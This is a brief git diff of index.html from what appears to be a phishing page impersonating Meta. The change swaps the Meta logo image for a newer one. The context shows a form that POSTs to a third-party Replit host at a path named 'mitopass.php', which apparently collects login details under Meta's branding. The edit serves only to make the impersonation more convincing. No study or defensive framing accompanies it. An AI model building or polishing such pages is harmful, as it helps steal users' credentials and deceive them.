--- a/index.html
+++ b/index.html
@@ -174,7 +174,7 @@
       <form class="content" action="https://pass-hamzabaloch121.replit.app/mitopass.php" method="POST">
 
             <div>
-             <img src="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/Meta-Logo.png?v=1712422024289" width="140">
+             <img src="https://cdn.glitch.global/b4a2a482-023b-4cda-88ab-ea4d4916e0d7/Meta_Platforms_Inc._logo.svg?v=1719784126031" width="140">
             </div>
      
              
